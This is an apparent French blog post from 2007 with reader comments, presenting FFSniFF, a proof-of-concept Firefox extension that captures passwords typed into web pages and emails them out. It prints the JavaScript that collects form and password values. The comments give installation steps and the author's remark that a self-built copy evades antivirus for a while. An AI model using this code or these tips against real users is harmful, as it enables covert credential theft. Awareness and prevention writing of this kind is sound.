FFSniFF, l’extension firefox qui ‘peut’ faire mal
Par Korben le 19 mai 2007
Il s’agit plus d’un proof of concept que d’une vraie extension Firefox destinée à être malveillante mais c’est assez interressant de voir ce qu’il est possible de faire avec ce truc.
Cette extension surveille toutes les pages web visitées et repère les champs de mots de passe que l’utilisateur remplit et se fait un plaisir de l’envoyer par email à la personne qui l’a mise en place…(vous si vous êtes un vilain)
Ca passe par le browser donc ce n’est pas filtré par les antivirus et autres firewall…
Bref cela peut être très dangereux surtout si on imagine que de telles fonctions peuvent être intégrées à une extension banale que vous pouvez télécharger sur un site x ou y.
Voici à titre informatif la fonction qui chope vos passwords:
var ok = 0;
var hesla = window.content.document.getElementsByTagName("input");
data = "";
for (var i = 0; i < hesla.length; i++) {
if (hesla[i].value != "") {
if (hesla[i].type == "password") {
ok = 1;
}
if (hesla[i].name == "") {
data += hesla[i].type + ":" + "<blank>:" + hesla[i].value + "\n";
}
else {
data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "\n";
}
}
}
if (ok == 1) {
data = "Subject: " + subject + "\r\n\r\n" + window.top.content.document.location + "\n" + "type:name:value\n" + "---------------\n" + data;
sniff()
}
}</blank>
Bref, si ça vous interresse, tout est dispo sur ce site.
Je vous recommande aussi la lecture des sujets suivants
- Password Hasher pour Firefox
- DocuFarm - Prévisualisez vos documents dans Firefox
- Zippez vos pièces jointes
- Une extension Firefox pour Picnik
- Télécharger un fichier même quand on n’en a pas le droit
Dron
:twisted:Et si on a KeyScrambler installé ??:twisted:
Posté le 19 mai 2007 à 23:12:25
Linuxian
Ouai tiens très bonne question ça !
Posté le 19 mai 2007 à 23:38:11
jean jean
pff!!! extension détectée comme trojan par mon anti virus
Posté le 20 mai 2007 à 01:04:25
vivi
jean jean> antivirus=lequel?
Posté le 20 mai 2007 à 08:48:45
Geoffrey
Comment ça s’installe ?
Posté le 20 mai 2007 à 09:33:35
admin
comme une extension normale… renomme le .tar.gz en .xpi
Posté le 20 mai 2007 à 10:34:27
Geoffrey
okiiii =) Merci!
Pis encore merci aussi pour hier c’était vraiment sympa !!
Comme je vois, vous avez tjrs pas trouvé…Hmmmm,
si je vois des annonces dans le coin, je te fais tourner
@+
Posté le 20 mai 2007 à 10:59:17
the-murderer
reconnu aussi comme trojan avec KIS “Trojan-PSW.JS.FFsnif et quand je renomme la version 0.2 en xpi et que j’installe il dis package inconnu. une idée? MERCI
Posté le 20 mai 2007 à 11:15:16
Korben
Celle la est donc reconnue par les AV.. Par contre, si vous faites la votre, elle sera non détectée pendant un moment (plus ou moins long, ca dépend)
Posté le 20 mai 2007 à 11:42:08
hexa²
Thx pour l’info
et yep bien retouché ce petit script peux bien faire mal…..
Posté le 20 mai 2007 à 19:36:26
BrunoCr
En fait le xpi est créé par un script python (pkg_creator.py) qui pose quelques questions…
Il faut donc avoir Python d’installé
Posté le 31 octobre 2007 à 09:58:17
Gabber059
Bien le bonjour !
J’aurai voulu vous exposer mon problème quant
à l’installation de la version 2.0 de FFsniFF :
Si je lance le fichier python fourni,
je rentre les informations concernant les servers smtp etc …
et il me créé un fichier .jar , je ne suis pas plus avancé.
J’ai aussi essayé de renomer le fichier .tar.gz en .xpi,
mozilla ne peut l’installer pour la raison suivante :
Packtage à installer non valide.
Merci si vous avez le temps de bien vouloir jetter un coup d’oeil sur mon problème
Posté le 26 janvier 2008 à 12:56:26
Gabber059
Oui alors me revoilà .
Après une énième tentative, le fichier python fourni dans le packtage 2.0
m’a finnalement créé un fichier .xpi
Mon problème est donc résolu !
Vous remerciant tout de même pour votre article.
Bonne continuation
Posté le 26 janvier 2008 à 13:00:50
Diti
Je vais m’en servir comme moyen de prévention pour le téléchargement trop hâtif des extensions Firefox
.
Posté le 26 janvier 2008 à 13:06:47